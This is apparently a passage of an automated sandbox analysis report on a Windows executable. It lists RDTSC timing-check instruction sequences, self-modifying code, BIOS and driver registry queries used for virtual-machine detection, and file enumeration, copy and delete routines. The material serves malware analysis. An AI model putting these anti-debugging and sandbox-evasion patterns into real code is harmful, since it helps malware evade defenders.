                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 892F73 second address: 892F79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 892F79 second address: 892FAD instructions: 0x00000000 rdtsc 0x00000002 jns 00007F51CCC6C586h 0x00000008 je 00007F51CCC6C586h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edi 0x00000011 jmp 00007F51CCC6C594h 0x00000016 jmp 00007F51CCC6C58Eh 0x0000001b pop edi 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 892DE5 second address: 892DFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F51CD041DFAh 0x0000000d popad 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 892DFD second address: 892E08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F51CCC6C586h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 892E08 second address: 892E14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F51CD041DF6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 892E14 second address: 892E18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89B0F3 second address: 89B11C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CD041DFEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F51CD041E07h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89B11C second address: 89B13D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CCC6C58Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c push esi 0x0000000d pop esi 0x0000000e pop edi 0x0000000f push edx 0x00000010 je 00007F51CCC6C586h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89B13D second address: 89B142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89B142 second address: 89B149 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89998D second address: 899992 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 899992 second address: 8999A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 ja 00007F51CCC6C594h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 899AF2 second address: 899AFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F51CD041DF6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 899AFE second address: 899B08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 899C53 second address: 899C89 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F51CD041DFFh 0x0000000d jbe 00007F51CD041DFCh 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 push eax 0x00000018 pop eax 0x00000019 jnl 00007F51CD041DF6h 0x0000001f jl 00007F51CD041DF6h 0x00000025 popad 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 899C89 second address: 899CA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F51CCC6C586h 0x0000000a jmp 00007F51CCC6C58Fh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 899FAA second address: 899FAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 899FAE second address: 899FB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 899FB2 second address: 899FD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F51CD041E03h 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 899FD1 second address: 89A009 instructions: 0x00000000 rdtsc 0x00000002 je 00007F51CCC6C58Ch 0x00000008 push ecx 0x00000009 jmp 00007F51CCC6C590h 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F51CCC6C58Dh 0x00000019 jnp 00007F51CCC6C586h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89A009 second address: 89A00D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89A317 second address: 89A31B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89A31B second address: 89A325 instructions: 0x00000000 rdtsc 0x00000002 je 00007F51CD041DF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89A325 second address: 89A32B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89A32B second address: 89A343 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F51CD041E04h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89A343 second address: 89A347 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89ADB6 second address: 89ADCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F51CD041DF6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jne 00007F51CD041DF6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89C847 second address: 89C84C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89C84C second address: 89C878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F51CD041E00h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F51CD041E03h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89EFDD second address: 89EFE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89EFE3 second address: 89EFE9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A7548 second address: 8A7565 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F51CCC6C599h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A7565 second address: 8A7581 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F51CD041E01h 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AEA5D second address: 8AEA66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ecx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AE8C4 second address: 8AE8E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F51CD041E0Eh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1D01 second address: 8B1D0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F51CCC6C586h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A99AC second address: 8A99B4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A99B4 second address: 8A99BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BE283 second address: 8BE29A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F51CD041DFEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D099D second address: 8D09CA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F51CCC6C58Eh 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F51CCC6C596h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CF731 second address: 8CF74C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CD041E07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CF887 second address: 8CF89B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F51CCC6C586h 0x0000000a popad 0x0000000b pushad 0x0000000c jnl 00007F51CCC6C586h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CFA06 second address: 8CFA0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CFA0B second address: 8CFA48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push edx 0x0000000f pop edx 0x00000010 jmp 00007F51CCC6C58Dh 0x00000015 jmp 00007F51CCC6C58Ah 0x0000001a popad 0x0000001b pushad 0x0000001c jmp 00007F51CCC6C592h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CFA48 second address: 8CFA4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CFA4D second address: 8CFA53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CFA53 second address: 8CFA59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CFA59 second address: 8CFA7E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jg 00007F51CCC6C586h 0x0000000f jmp 00007F51CCC6C594h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CFD28 second address: 8CFD31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 pop edi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CFD31 second address: 8CFD37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D034F second address: 8D0366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F51CD041DFCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D0366 second address: 8D036A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D036A second address: 8D0384 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CD041E06h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D0384 second address: 8D038A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D038A second address: 8D0390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D0390 second address: 8D03A8 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F51CCC6C586h 0x00000008 jnc 00007F51CCC6C586h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push edi 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D03A8 second address: 8D03D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F51CD041DFEh 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F51CD041E09h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D03D6 second address: 8D03DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D03DA second address: 8D03E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D055A second address: 8D058A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jnc 00007F51CCC6C592h 0x0000000e push ecx 0x0000000f pushad 0x00000010 popad 0x00000011 pop ecx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007F51CCC6C58Bh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D610E second address: 8D6139 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jp 00007F51CD041DF6h 0x0000000c jmp 00007F51CD041E02h 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 jnc 00007F51CD041DF6h 0x0000001d pop esi 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D6420 second address: 8D6424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D6424 second address: 8D642A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D642A second address: 8D6496 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F51CCC6C58Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jno 00007F51CCC6C592h 0x00000011 nop 0x00000012 mov dl, 4Bh 0x00000014 push 00000004h 0x00000016 push 00000000h 0x00000018 push eax 0x00000019 call 00007F51CCC6C588h 0x0000001e pop eax 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 add dword ptr [esp+04h], 00000018h 0x0000002b inc eax 0x0000002c push eax 0x0000002d ret 0x0000002e pop eax 0x0000002f ret 0x00000030 mov dh, 55h 0x00000032 mov edx, dword ptr [ebp+122D375Ch] 0x00000038 call 00007F51CCC6C589h 0x0000003d jmp 00007F51CCC6C58Dh 0x00000042 push eax 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D6496 second address: 8D649A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D6769 second address: 8D676E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D676E second address: 8D67F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CD041E03h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F51CD041DF8h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 push dword ptr [ebp+1244C39Fh] 0x0000002c push 00000000h 0x0000002e push eax 0x0000002f call 00007F51CD041DF8h 0x00000034 pop eax 0x00000035 mov dword ptr [esp+04h], eax 0x00000039 add dword ptr [esp+04h], 00000014h 0x00000041 inc eax 0x00000042 push eax 0x00000043 ret 0x00000044 pop eax 0x00000045 ret 0x00000046 jmp 00007F51CD041E01h 0x0000004b call 00007F51CD041DF9h 0x00000050 push eax 0x00000051 push edx 0x00000052 jp 00007F51CD041DFCh 0x00000058 jp 00007F51CD041DF6h 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D67F7 second address: 8D680E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F51CCC6C593h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D680E second address: 8D6835 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CD041DFFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F51CD041DFCh 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F10487 second address: 4F10499 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F51CCC6C58Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F10499 second address: 4F1049D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F1049D second address: 4F104AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F104AC second address: 4F104C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CD041E05h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F104C5 second address: 4F104CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F104CB second address: 4F104CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F104CF second address: 4F104D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F104D3 second address: 4F10559 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007F51CD041DFFh 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F51CD041E02h 0x0000001a adc esi, 699FF8F8h 0x00000020 jmp 00007F51CD041DFBh 0x00000025 popfd 0x00000026 pushfd 0x00000027 jmp 00007F51CD041E08h 0x0000002c or si, 5358h 0x00000031 jmp 00007F51CD041DFBh 0x00000036 popfd 0x00000037 popad 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F51CD041E06h 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F105B4 second address: 4F105BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F105BA second address: 4F105EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CD041E03h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F51CD041E05h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F105EB second address: 4F10618 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CCC6C591h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F51CCC6C593h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F10618 second address: 4F1061E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F1061E second address: 4F1064B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop ebx 0x00000005 pushfd 0x00000006 jmp 00007F51CCC6C58Eh 0x0000000b add si, E0C8h 0x00000010 jmp 00007F51CCC6C58Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a pushad 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 64D9B9 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 7EBB54 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 7EA65C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 8796B0 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 7EA296 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: C:\Users\user\Desktop\file.exeEvaded block: after key decision graph_0-38818
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003740F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_003740F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0036E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0036E530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00361710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00361710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0036F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0036F7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003747C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_003747C0
